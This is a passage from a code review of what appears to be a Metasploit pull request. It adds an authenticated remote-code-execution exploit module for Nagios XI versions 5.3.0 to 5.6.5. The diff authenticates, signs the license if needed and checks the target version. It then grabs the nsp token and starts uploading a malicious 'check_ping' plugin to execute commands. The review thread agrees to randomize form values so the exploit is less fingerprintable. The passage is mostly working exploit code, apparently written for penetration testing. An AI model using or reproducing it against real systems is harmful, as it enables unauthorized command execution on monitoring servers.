modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb

```diff
@@ -0,0 +1,280 @@
+        return CheckCode::Detected('Failed to install Nagios XI on the target.')
+      end
+    end
+
+    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
+    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
+    if login_result == 5 # the Nagios XI license agreement has not been signed
+      auth_cookies, nsp = res_array
+      sign_license_result = sign_license_agreement(auth_cookies, nsp)
+      if sign_license_result
+        return CheckCode::Unknown(sign_license_result[1])
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..3
+        return CheckCode::Unknown(res_array[0])
+      when 5 # the Nagios XI license agreement still has not been signed
+        return CheckCode::Detected('Failed to sign the license agreement.')
+      end
+    end
+
+    print_good('Successfully authenticated to Nagios XI')
+
+    # Obtain the Nagios XI version
+    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
+
+    nagios_version = nagios_xi_version(res_array[0])
+    if nagios_version.nil?
+      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
+    end
+
+    print_status("Target is Nagios XI with version #{nagios_version}")
+    # check if the target is actually vulnerable
+    @version = Rex::Version.new(nagios_version)
+    if @version >= Rex::Version.new('5.3.0') && @version <= Rex::Version.new('5.6.5')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def grab_plugins_nsp
+    # visit the plugins page to grab the nsp token required for uploadin the payload
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php'),
+      'method' => 'GET',
+      'cookie' => @auth_cookies
+    })
+
+    unless res
+      fail_with(Failure::Disconnected, "Connection failed while trying to visit `#{normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')}`")
+    end
+
+    unless res.code == 200 && res.body.include?('<title>Manage Plugins &middot; Nagios XI</title>')
+      fail_with(Failure::UnexpectedReply, "Unexpected response received while trying to visit `#{normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')}`")
+    end
+
+    @nsp = get_nsp(res)
+
+    if @nsp.blank?
+      fail_with(Failure::Unknown, 'Failed to obtain the nsp token required to upload the payload')
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status("Uploading malicious 'check_ping' plugin...")
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('1', nil, nil, 'form-data; name="upload"')
+    post_data.add_part(@nsp, nil, nil, 'form-data; name="nsp"')
+    post_data.add_part('20000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
```

Comment:
Any way this number could be randomly generated or does it have to be `20000000`? Same for the `1` above. Sorry if it can't be, just thought I'd ask.

Reply:
Alright testing this on Nagios XI 5.6.5 it seems both of these elements can be any random string containing numberic characters so I'll update the exploit to generate random valid entries accordingly.